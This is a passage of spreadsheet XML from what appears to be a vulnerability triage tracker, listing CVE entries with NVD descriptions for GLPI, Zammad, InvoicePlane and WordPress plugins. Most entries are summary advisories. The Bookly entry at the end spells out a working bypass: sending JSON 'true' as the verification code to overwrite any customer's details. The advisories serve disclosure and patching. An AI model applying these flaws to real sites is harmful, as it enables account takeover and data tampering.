        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C351" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45801</t>
        </is>
      </c>
      <c r="D351" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E351" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F351" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G351" s="5" t="inlineStr"/>
      <c r="H351" s="5" t="inlineStr"/>
      <c r="I351" s="5" t="inlineStr"/>
      <c r="J351" s="5" t="inlineStr"/>
      <c r="K351" s="5" t="inlineStr"/>
      <c r="L351" s="5" t="inlineStr"/>
      <c r="M351" s="5" t="inlineStr"/>
      <c r="N351" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O351" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P351" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q351" s="5" t="inlineStr"/>
      <c r="R351" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S351" s="5" t="inlineStr">
        <is>
          <t>GLPI is a free asset and IT management software package. From 0.72 until 10.0.26 and 11.0.8, an authenticated user without the required permission can enable debug mode. The affected user-setting update does not enforce the privilege boundary intended to restrict debug-mode activation. This issue is fixed in versions 11.0.8 and 10.0.26.</t>
        </is>
      </c>
      <c r="T351" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45801</t>
        </is>
      </c>
    </row>
    <row r="352">
      <c r="A352" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B352" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C352" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55217</t>
        </is>
      </c>
      <c r="D352" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E352" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F352" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G352" s="5" t="inlineStr"/>
      <c r="H352" s="5" t="inlineStr"/>
      <c r="I352" s="5" t="inlineStr"/>
      <c r="J352" s="5" t="inlineStr"/>
      <c r="K352" s="5" t="inlineStr"/>
      <c r="L352" s="5" t="inlineStr"/>
      <c r="M352" s="5" t="inlineStr"/>
      <c r="N352" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O352" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P352" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q352" s="5" t="inlineStr"/>
      <c r="R352" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="S352" s="5" t="inlineStr">
        <is>
          <t>GLPI is a free asset and IT management software package. From 0.85 until 10.0.26 and 11.0.8, a low-privileged authenticated user can create, update, or delete knowledge base comments and translations without the required authorization for the affected content. This issue is fixed in versions 11.0.8 and 10.0.26.</t>
        </is>
      </c>
      <c r="T352" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55217</t>
        </is>
      </c>
    </row>
    <row r="353">
      <c r="A353" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B353" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C353" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56728</t>
        </is>
      </c>
      <c r="D353" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E353" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F353" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G353" s="5" t="inlineStr"/>
      <c r="H353" s="5" t="inlineStr"/>
      <c r="I353" s="5" t="inlineStr"/>
      <c r="J353" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K353" s="5" t="inlineStr"/>
      <c r="L353" s="5" t="inlineStr"/>
      <c r="M353" s="5" t="inlineStr"/>
      <c r="N353" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O353" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P353" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q353" s="5" t="inlineStr"/>
      <c r="R353" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-639</t>
        </is>
      </c>
      <c r="S353" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.2, a broken access control vulnerability exists in Zammad's GraphQL API. An authenticated user can access taskbar item data belonging to another user by crafting a request with the target user's taskbar identifier. The taskbar feature stores transient state for active user sessions, including auto-saved ticket drafts. Under certain conditions, the authorization check for taskbar item access is not enforced, allowing a user to read another user's taskbar item data. This vulnerability is fixed in 7.0.2.</t>
        </is>
      </c>
      <c r="T353" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56728</t>
        </is>
      </c>
    </row>
    <row r="354">
      <c r="A354" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B354" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C354" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56732</t>
        </is>
      </c>
      <c r="D354" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E354" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F354" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G354" s="5" t="inlineStr"/>
      <c r="H354" s="5" t="inlineStr"/>
      <c r="I354" s="5" t="inlineStr"/>
      <c r="J354" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K354" s="5" t="inlineStr"/>
      <c r="L354" s="5" t="inlineStr"/>
      <c r="M354" s="5" t="inlineStr"/>
      <c r="N354" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O354" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P354" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q354" s="5" t="inlineStr"/>
      <c r="R354" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-352</t>
        </is>
      </c>
      <c r="S354" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.2, vulnerability in Zammad's HTML sanitization allows injection of specific HTML elements into ticket bodies. When another user views the crafted ticket, the injected element can trigger a logout request, terminating the viewer's session. This vulnerability is fixed in 7.0.2.</t>
        </is>
      </c>
      <c r="T354" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56732</t>
        </is>
      </c>
    </row>
    <row r="355">
      <c r="A355" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B355" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C355" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56734</t>
        </is>
      </c>
      <c r="D355" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E355" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F355" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G355" s="5" t="inlineStr"/>
      <c r="H355" s="5" t="inlineStr"/>
      <c r="I355" s="5" t="inlineStr"/>
      <c r="J355" s="5" t="inlineStr"/>
      <c r="K355" s="5" t="inlineStr"/>
      <c r="L355" s="5" t="inlineStr"/>
      <c r="M355" s="5" t="inlineStr"/>
      <c r="N355" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O355" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P355" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q355" s="5" t="inlineStr"/>
      <c r="R355" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S355" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.2, during federated authentication (OAuth/OIDC/SAML), a profile image URL from the external identity provider is fetched without verifying the target address. An actor who controls their profile at a connected provider may cause the server to connect to internal network locations. Response timing and error patterns differ between reachable and unreachable targets, allowing internal service probing. Worker processes may be blocked for several seconds per request. Requires a configured external authentication provider where the actor can modify their profile image URL. This issue is fixed in version 7.0.2.</t>
        </is>
      </c>
      <c r="T355" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56734</t>
        </is>
      </c>
    </row>
    <row r="356">
      <c r="A356" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B356" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C356" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56735</t>
        </is>
      </c>
      <c r="D356" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E356" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F356" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G356" s="5" t="inlineStr"/>
      <c r="H356" s="5" t="inlineStr"/>
      <c r="I356" s="5" t="inlineStr"/>
      <c r="J356" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K356" s="5" t="inlineStr"/>
      <c r="L356" s="5" t="inlineStr"/>
      <c r="M356" s="5" t="inlineStr"/>
      <c r="N356" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O356" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P356" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q356" s="5" t="inlineStr"/>
      <c r="R356" s="5" t="inlineStr">
        <is>
          <t>CWE-82</t>
        </is>
      </c>
      <c r="S356" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.2 and 7.1.0, zammad's HTML sanitizer (HtmlSanitizer::Strict) blocks external URLs in  to prevent remote content loading, but the srcset attribute, also allowlisted for , is not subject to the same check. This oversight allows an attacker to embed arbitrary external URLs in the srcset attribute just by sending an e-mail, effectively bypassing the external content protection. When an agent views the ticket containing the malicious srcset, the browser will silently load the attacker-controlled URL, resulting in the leakage of the agent's IP address, User-Agent, Referer, and the exact time the ticket was viewed. HtmlSanitizer::Strict got extended to block external URLs in the srcset attribute of  tags. This was done to prevent tracking pixels and external content loading, which could compromise user privacy. This issue is fixed in versions 7.0.2 and 7.1.0.</t>
        </is>
      </c>
      <c r="T356" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56735</t>
        </is>
      </c>
    </row>
    <row r="357">
      <c r="A357" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B357" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C357" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61855</t>
        </is>
      </c>
      <c r="D357" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E357" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F357" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G357" s="5" t="inlineStr"/>
      <c r="H357" s="5" t="inlineStr"/>
      <c r="I357" s="5" t="inlineStr"/>
      <c r="J357" s="5" t="inlineStr">
        <is>
          <t>go, rust</t>
        </is>
      </c>
      <c r="K357" s="5" t="inlineStr"/>
      <c r="L357" s="5" t="inlineStr"/>
      <c r="M357" s="5" t="inlineStr"/>
      <c r="N357" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O357" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P357" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q357" s="5" t="inlineStr"/>
      <c r="R357" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S357" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. In 7.0.3 and 7.1.1, under certain conditions, Zammad's verification of inbound PGP-signed email can mark a message as carrying a valid ("Good") PGP signature from a registered sender key, even though the displayed message content is not actually covered by that signature. As a result, the inbound article may be stored with a successful signature status that does not reflect the authenticity of the shown content. This can mislead agents who rely on the signature indicator when assessing the trustworthiness of incoming mail. This issue is fixed in version 7.1.2.</t>
        </is>
      </c>
      <c r="T357" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61855</t>
        </is>
      </c>
    </row>
    <row r="358">
      <c r="A358" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B358" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C358" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63006</t>
        </is>
      </c>
      <c r="D358" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E358" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F358" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G358" s="5" t="inlineStr"/>
      <c r="H358" s="5" t="inlineStr"/>
      <c r="I358" s="5" t="inlineStr"/>
      <c r="J358" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K358" s="5" t="inlineStr"/>
      <c r="L358" s="5" t="inlineStr"/>
      <c r="M358" s="5" t="inlineStr"/>
      <c r="N358" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O358" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P358" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q358" s="5" t="inlineStr"/>
      <c r="R358" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S358" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.1.2, attacker-controlled HTML in inbound emails or tickets could bypass the image URL sanitizer using path traversal sequences. When an authenticated agent views the content, the browser resolves the URL to a protected API endpoint and sends the request with the agent's session cookie, enabling side effects such as forced logout without any user interaction. This issue is fixed in version 7.1.2.</t>
        </is>
      </c>
      <c r="T358" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63006</t>
        </is>
      </c>
    </row>
    <row r="359">
      <c r="A359" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B359" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C359" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63206</t>
        </is>
      </c>
      <c r="D359" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E359" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F359" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G359" s="5" t="inlineStr"/>
      <c r="H359" s="5" t="inlineStr"/>
      <c r="I359" s="5" t="inlineStr"/>
      <c r="J359" s="5" t="inlineStr"/>
      <c r="K359" s="5" t="inlineStr"/>
      <c r="L359" s="5" t="inlineStr"/>
      <c r="M359" s="5" t="inlineStr"/>
      <c r="N359" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O359" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P359" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q359" s="5" t="inlineStr"/>
      <c r="R359" s="5" t="inlineStr">
        <is>
          <t>CWE-184, CWE-20</t>
        </is>
      </c>
      <c r="S359" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.1.2, zammad's HTML sanitizer, which blocks remote images in ticket articles and email views, can be bypassed using a shortened URL format that omits the double slash after the scheme (for example a shortened HTTP URL instead of a shortened HTTP URL). Modern browsers treat both forms as equivalent remote URLs. As a result, an attacker who sends a crafted email or ticket can cause the recipient's browser to silently load an image from an external server, revealing when and by whom the ticket was opened. Zammad's "remote content blocked" warning is not shown because the sanitizer does not recognize the shortened form as remote. This issue is fixed in version 7.1.2.</t>
        </is>
      </c>
      <c r="T359" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63206</t>
        </is>
      </c>
    </row>
    <row r="360">
      <c r="A360" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B360" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C360" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63216</t>
        </is>
      </c>
      <c r="D360" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E360" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F360" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G360" s="5" t="inlineStr"/>
      <c r="H360" s="5" t="inlineStr"/>
      <c r="I360" s="5" t="inlineStr"/>
      <c r="J360" s="5" t="inlineStr"/>
      <c r="K360" s="5" t="inlineStr"/>
      <c r="L360" s="5" t="inlineStr"/>
      <c r="M360" s="5" t="inlineStr"/>
      <c r="N360" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O360" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P360" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q360" s="5" t="inlineStr"/>
      <c r="R360" s="5" t="inlineStr">
        <is>
          <t>CWE-80</t>
        </is>
      </c>
      <c r="S360" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.1.2, unsanitized option labels are rendered in the configuration dialogs of AI Agents within Zammad's admin UI. When rendering the list of selected options, the option label is output as raw HTML without escaping. An attacker who can control an option label, for example by setting a malicious string as a user or organization name used in a relation attribute, or by supplying a crafted custom attribute option value, can inject arbitrary HTML and JavaScript. The payload executes in the browser of any admin or agent who opens the affected object attribute configuration view. This issue is fixed in version 7.1.2.</t>
        </is>
      </c>
      <c r="T360" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63216</t>
        </is>
      </c>
    </row>
    <row r="361">
      <c r="A361" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B361" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C361" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80514</t>
        </is>
      </c>
      <c r="D361" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E361" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F361" s="5" t="inlineStr">
        <is>
          <t>contact@wpscan.com</t>
        </is>
      </c>
      <c r="G361" s="5" t="inlineStr"/>
      <c r="H361" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I361" s="5" t="inlineStr"/>
      <c r="J361" s="5" t="inlineStr">
        <is>
          <t>requests, gin</t>
        </is>
      </c>
      <c r="K361" s="5" t="inlineStr"/>
      <c r="L361" s="5" t="inlineStr"/>
      <c r="M361" s="5" t="inlineStr"/>
      <c r="N361" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O361" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P361" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q361" s="5" t="inlineStr"/>
      <c r="R361" s="5" t="inlineStr">
        <is>
          <t>CWE-348</t>
        </is>
      </c>
      <c r="S361" s="5" t="inlineStr">
        <is>
          <t>The wpForo Forum WordPress plugin from 3.0.0 before 3.1.6 does not verify the source of client-supplied IP address headers before using them to key its per-visitor rate limit on paid AI requests, allowing unauthenticated attackers to bypass the limit by spoofing the header and exhaust the site owner's metered AI credits.</t>
        </is>
      </c>
      <c r="T361" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80514</t>
        </is>
      </c>
    </row>
    <row r="362">
      <c r="A362" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B362" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C362" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84460</t>
        </is>
      </c>
      <c r="D362" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E362" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F362" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G362" s="5" t="inlineStr"/>
      <c r="H362" s="5" t="inlineStr"/>
      <c r="I362" s="5" t="inlineStr"/>
      <c r="J362" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K362" s="5" t="inlineStr"/>
      <c r="L362" s="5" t="inlineStr"/>
      <c r="M362" s="5" t="inlineStr"/>
      <c r="N362" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O362" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P362" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q362" s="5" t="inlineStr"/>
      <c r="R362" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S362" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.1.2, any authenticated user can call the REST endpoint for getting a tag list and receive the tag names for the given ticket, regardless of whether they have access to that ticket. Tags are an internal categorization feature and may contain sensitive labels. Ticket IDs are sequential integers, making bulk enumeration straightforward. This issue is fixed in version 7.1.2.</t>
        </is>
      </c>
      <c r="T362" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84460</t>
        </is>
      </c>
    </row>
    <row r="363">
      <c r="A363" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B363" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C363" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85290</t>
        </is>
      </c>
      <c r="D363" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E363" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F363" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G363" s="5" t="inlineStr"/>
      <c r="H363" s="5" t="inlineStr"/>
      <c r="I363" s="5" t="inlineStr"/>
      <c r="J363" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K363" s="5" t="inlineStr"/>
      <c r="L363" s="5" t="inlineStr"/>
      <c r="M363" s="5" t="inlineStr"/>
      <c r="N363" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O363" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P363" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q363" s="5" t="inlineStr"/>
      <c r="R363" s="5" t="inlineStr">
        <is>
          <t>CWE-117</t>
        </is>
      </c>
      <c r="S363" s="5" t="inlineStr">
        <is>
          <t>InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. Prior to 1.7.2, InvoicePlane's Cron::recur() method writes an invalid cron key from the URL path directly to the application log without neutralizing CRLF characters. An unauthenticated requester can place forged log lines into the audit trail by supplying a crafted cron_key value. The injected entries can corrupt forensic records and interfere with log-based monitoring. This issue is fixed in version 1.7.2.</t>
        </is>
      </c>
      <c r="T363" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85290</t>
        </is>
      </c>
    </row>
    <row r="364">
      <c r="A364" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B364" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C364" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86837</t>
        </is>
      </c>
      <c r="D364" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E364" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F364" s="5" t="inlineStr">
        <is>
          <t>contact@wpscan.com</t>
        </is>
      </c>
      <c r="G364" s="5" t="inlineStr"/>
      <c r="H364" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I364" s="5" t="inlineStr"/>
      <c r="J364" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K364" s="5" t="inlineStr"/>
      <c r="L364" s="5" t="inlineStr"/>
      <c r="M364" s="5" t="inlineStr"/>
      <c r="N364" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O364" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P364" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q364" s="5" t="inlineStr"/>
      <c r="R364" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S364" s="5" t="inlineStr">
        <is>
          <t>The Bookly WordPress plugin before 28.3 does not properly verify a customer's identity before updating their stored details, allowing unauthenticated attackers who know a customer's primary identifier to overwrite that customer's stored personal information such as name, email and address.</t>
        </is>
      </c>
      <c r="T364" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86837</t>
        </is>
      </c>
    </row>
    <row r="365">
      <c r="A365" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B365" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C365" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92799</t>
        </is>
      </c>
      <c r="D365" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E365" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F365" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G365" s="5" t="inlineStr"/>
      <c r="H365" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I365" s="5" t="inlineStr"/>
      <c r="J365" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K365" s="5" t="inlineStr"/>
      <c r="L365" s="5" t="inlineStr"/>
      <c r="M365" s="5" t="inlineStr"/>
      <c r="N365" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O365" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P365" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q365" s="5" t="inlineStr"/>
      <c r="R365" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="S365" s="5" t="inlineStr">
        <is>
          <t>The Online Scheduling and Appointment Booking System – Bookly plugin for WordPress is vulnerable to Authorization Bypass via PHP Type Juggling in all versions up to, and including, 28.2. This is due to the `postValidateCustomer()` function using a loose PHP inequality operator (`!=`) to compare the session-stored one-time verification code against the attacker-supplied `verification_code` parameter — a flaw that is further exposed by the booking AJAX controller registering all its methods as `wp_ajax_nopriv_` handlers and unconditionally overriding `csrfTokenValid()` to return true, leaving the endpoint both unauthenticated and CSRF-unprotected. This makes it possible for unauthenticated attackers to bypass the phone/email ownership verification step and overwrite the name, email, phone, and address fields of any arbitrary existing Bookly customer record, redirecting that customer's booking notifications to attacker-controlled contact details. The bypass is achievable because the `json_data` input channel decodes input via `json_decode()`, which preserves real PHP types and causes the `wp_kses` filter to leave non-string values such as the JSON boolean `true` untouched; submitting `true` as the `verification_code` satisfies the loose comparison against the session's non-zero integer code (generated by `mt_rand(100000, 999999)`), causing `true != &lt;non-zero int&gt;` to evaluate as `false` and the guard to be bypassed.</t>
        </is>
      </c>
